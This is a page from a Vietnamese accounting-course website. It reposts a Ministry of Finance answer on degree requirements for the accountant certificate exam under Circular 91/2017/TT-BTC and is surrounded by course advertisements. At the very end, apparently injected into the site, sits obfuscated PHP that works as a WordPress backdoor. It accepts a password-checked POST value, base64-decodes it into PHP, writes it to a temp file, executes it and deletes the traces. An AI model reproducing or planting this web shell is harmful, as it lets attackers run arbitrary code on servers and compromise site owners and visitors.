1

Những điều kiện để thi chứng chỉ CPA gồm những gì

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Hôm nay mình chia sẻ lại khi tham khảo được bài viết rất hay mà nhiều bạn rất cần:

CHI TIẾT HỎI ĐÁP VỀ ĐIỀU KIỆN DƯ THI CHỨNG CHỈ CPA

Hỏi:
Tôi tốt nghiệp ngành quản trị dịch vụ du lịch và lữ hành tại trường Đại học Nha Trang. Trong chương trình học, tôi đã học các môn: Nguyên lý kế toán (4 đơn vị học phần); Kế toán quản trị (3 đơn vị học phần); Kế toán tài chính (3 đơn vị học phần); Kế toán thương mại du lịch (3 đơn vị học phần) và Quản trị tài chính (4 đơn vị học phần) trong tổng số 187 đơn vị học phần, chiếm 9,09%. Ngoài ra, tôi cũng tốt nghiệp thạc sĩ quản lý kinh kế tại Đại học Nha Trang.
Cho tôi hỏi, trong chương trình học có môn tài chính công (2 TC), có được tính vào các môn học của ngành tài chính không?

Tham khảo Điều 4 Thông tư số 91/2017/TT-BTC quy định về việc thi, cấp, quản lý chứng chỉ kiểm toán viên và chứng chỉ kế toán viên thì việc cấp chứng chỉ hành nghề kế toán, kiểm toán có điều kiện về bằng cấp như sau: Bằng tốt nghiệp đại học các chuyên ngành khác với tổng số đơn vị học trình (hoặc tiết học) các môn học: Tài chính, Kế toán, Kiểm toán, Phân tích hoạt động tài chính, Thuế từ 7% trở lên trên tổng số học trình (hoặc tiết học) cả khóa học.

Vậy cho tôi hỏi, các môn tôi đã học như nêu trên có hợp lệ để được tính trên 7% tổng số học trình không? Có đủ điều kiện để dự thi chứng chỉ hành nghề kế toán không?
17/06/2024
Trả lời:
Khoản 2, Điều 4 Thông tư số 91/2017/TT-BTC ngày 31/8/2017 của Bộ Tài chính quy định về việc thi, cấp, quản lý chứng chỉ kiểm toán viên và chứng chỉ kế toán viên có quy định cụ thể về điều kiện văn bằng, chứng chỉ để dự thi lấy chứng chỉ kiểm toán viên, chứng chỉ kế toán viên:

“2. Có bằng tốt nghiệp đại học trở lên về chuyên ngành Tài chính, Ngân hàng, Kế toán, Kiểm toán; hoặc có bằng tốt nghiệp đại học các chuyên ngành khác với tổng số đơn vị học trình (hoặc tiết học) các môn học: Tài chính, Kế toán, Kiểm toán, Phân tích hoạt động tài chính, Thuế từ 7% trở lên trên tổng số học trình (hoặc tiết học) cả khóa học; hoặc có bằng tốt nghiệp đại học các chuyên ngành khác và có văn bằng, chứng chỉ hoàn thành các khoá học do Tổ chức nghề nghiệp quốc tế về kế toán, kiểm toán cấp bảo đảm các quy định tại Điều 9 Thông tư này;”

Căn cứ quy định trên, các môn học theo như thông tin tại câu hỏi (nguyên lý kế toán, kế toán quản trị, kế toán tài chính, kế toán thương mại du lịch, quản trị tài chính, tài chính công) được tính tỷ lệ phần trăm tổng số đơn vị học trình trên tổng số học trình cả khóa học.

Ngoài điều kiện về văn bằng, chứng chỉ nêu trên, tại Điều 4 Thông tư số 91/2017/TT-BTC ngày 31/8/2017 của Bộ Tài chính có quy định các điều kiện dự thi lấy chứng chỉ kiểm toán viên, chứng chỉ kế toán viên. Do vậy, đề nghị ông Thắng nghiên cứu quy định này để đảm bảo có đầy đủ điều kiện dự thi lấy chứng chỉ kế toán viên theo quy định.
Trên đây là ý kiến trả lời của Bộ Tài chính để ông Nguyễn Hoàng Trọng Thắng biết./.

———0———

– Chuyên cung cấp khóa HỌC KẾ TOÁN THỰC HÀNH THỰC CHIẾN ĐỂ RA NGHỀ ĐI LÀM NGAY
– NHẬN DẠY KẾ TOÁN CHO NGƯỜI CHƯA BIẾT GÌ HOẶC MẤT GỐC
– Dạy nâng cao để thành thạo kế toán tổng hợp. Dạy kèm riêng 1-1 kế toán theo mọi nhu cầu
CUNG CẤP DỊCH VỤ KẾ TOÁN TRỌN GÓI UY TÍN – GIÁ RẺ CHO DOANH NGHIỆP
– Dạy Trực Tiếp tại các chi nhánh trực thuộc toàn Quốc hoặc Onl Trực Tuyến, Inbox Zalo mình nhé – 0973.761.751 (Hotline)

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}